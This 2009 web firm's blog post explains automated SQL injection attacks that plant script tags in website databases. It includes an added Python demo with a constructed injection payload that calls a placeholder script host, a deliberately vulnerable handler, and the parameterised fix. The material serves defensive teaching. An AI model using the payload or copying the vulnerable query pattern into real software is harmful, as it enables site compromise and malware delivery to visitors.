





  Posted on Friday, May 15, 2009



SQL INJECTIONS. WHAT IT MEANS FOR YOUR WEBSITE.

There are many types of SQL injection out there. The older kind targeted flaws in the server software itself, such as Microsoft Windows Server and Microsoft SQL Server, and the attacker had to be able to reach those servers directly in order to carry it out.

Now that those server-side holes have been patched, a new breed of SQL injection has arrived.

Around the end of the first quarter of 2008 (roughly March) a new attack was discovered. Unlike its predecessors, it does not rely on unpatched or open holes in the web server or the database server; it exploits flaws in the web application code itself, that is, in the pages that make up your website.

Hackers (mostly coming from China) are using what are called "malbots". These malbots are automated programs that use search engines to find websites whose URLs contain .asp? or .aspx?, that is, ASP and ASP.NET pages that take parameters in the query string.

Once it finds one, the malbot appends a SQL statement to the page's query string (the part of the URL after the ?) and requests the page. If the page pastes that value into its database query, the injected statement runs: the current wave inserts text into your records, and the same technique could delete entire database tables within seconds.

So far this attack has been relatively tame and has not caused widespread destruction (no mass deletion of database tables). The current wave adds a script tag to text fields in the database, so every page that renders one of those fields serves the tag to its visitors; the visitor's browser then opens a hidden iframe that loads a .js file from the attacker's site. The contents of these JavaScript files vary and are hard to decipher (what readable text they contain is in Chinese), but they all attempt to exploit vulnerabilities on the visitor's computer, including Microsoft vulnerabilities for which patches already exist and vulnerable ActiveX controls. A compromised site need show no visible defacement; the tell-tale sign is an unexpected <script> or <iframe> tag sitting inside a database text field.

Any website that uses a database can potentially be hit by this new breed of SQL injection. MS SQL, Oracle, Access and MySQL databases can all be exploited; the database product is not the weak point, the way the application builds the SQL statements it sends is. Likewise, no development language is immune: ASP, ASP.NET and PHP sites can all be exploited.

So, at this point, no website can be considered safe unless its code never allows values from the address bar (query-string parameters) or from user-entered fields, such as the billing information on a checkout page, to be treated as SQL. The reliable way to do that is to pass user input to the database as bound parameters of a prepared statement rather than concatenating it into the query text, and to validate each value against the type it is supposed to be before it goes anywhere near the database.
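The following is an added illustration, not code from the original post or from Intersoft. It reconstructs the two halves of the article in miniature: the query-string injection that appends a script tag to every text field, and the hardened handler that validates and binds its input. It uses Python's built-in sqlite3 module with an in-memory database and constructed sample rows; the payload, table and column names and the script host (example.invalid) are all made up for the example. SQLite does not execute a batch of several statements through execute(), so the vulnerable handler uses executescript() to stand in for a database driver that does, as SQL Server does.

```python
import html
import sqlite3

# Constructed payload in the shape the article describes: a product id from the
# query string with a second statement appended. The script host is a
# placeholder (example.invalid), not a real attack domain. SQLite spells string
# concatenation as ||; Transact-SQL would use +.
INJECTED_ID = (
    "1; UPDATE products SET description = description || "
    "'<script src=\"http://example.invalid/m.js\"></script>'"
)


def fresh_db():
    """In-memory database seeded with constructed sample rows (hypothetical schema)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT)"
    )
    con.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "Widget", "A small widget."), (2, "Gadget", "A useful gadget.")],
    )
    con.execute("CREATE TABLE billing (customer TEXT)")
    con.commit()
    return con


def descriptions(con):
    """All description fields in id order, so each handler's effect is visible."""
    return [r[0] for r in con.execute("SELECT description FROM products ORDER BY id")]


def product_page_vulnerable(con, raw_id):
    """The pattern the article warns about: the raw query-string value is pasted
    into the SQL text. executescript() mimics a driver that accepts a batch of
    semicolon-separated statements, so every statement the attacker appended
    runs. Returns the descriptions afterwards so the side effect can be seen."""
    sql = "SELECT name, description FROM products WHERE id = " + raw_id
    con.executescript(sql)
    return descriptions(con)


def product_page_safe(con, raw_id):
    """Hardened form: reject anything that is not an integer, then bind the
    value as a parameter so the database never parses it as SQL."""
    try:
        product_id = int(raw_id)
    except ValueError:
        return None  # refuse the request instead of guessing
    return con.execute(
        "SELECT name, description FROM products WHERE id = ?", (product_id,)
    ).fetchone()


def save_billing_name(con, name):
    """Free-text form fields (billing details at checkout) get the same rule:
    the value is bound, so it is stored verbatim and never executed."""
    con.execute("INSERT INTO billing (customer) VALUES (?)", (name,))
    con.commit()
    return con.execute("SELECT customer FROM billing").fetchone()[0]


def render(text):
    """Output encoding: even if a tag does reach a text field, escaping it on
    the way out stops the visitor's browser from running it."""
    return html.escape(text, quote=True)


if __name__ == "__main__":
    con = fresh_db()
    print(product_page_vulnerable(con, INJECTED_ID))  # every description now carries the tag
    con = fresh_db()
    print(product_page_safe(con, INJECTED_ID))        # None: request refused
    print(product_page_safe(con, "1"))                # ('Widget', 'A small widget.')
    print(descriptions(con))                          # unchanged
    print(save_billing_name(con, INJECTED_ID) == INJECTED_ID)  # True: stored as plain text
    print(render(descriptions(con)[0]))
```

Note that the safe handler needs both steps: binding alone would already keep the value out of the SQL parser, and the integer check on top of it turns a malformed id into a refused request rather than a silently empty result, which is also the event you want to see in your logs.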

Because this vulnerability has only recently begun to be exploited, all of Intersoft's customers whose sites use a database are exposed to it. We strongly recommend that customers contact their Sales Representative at 1.888.WEB.7228 to arrange a website update.



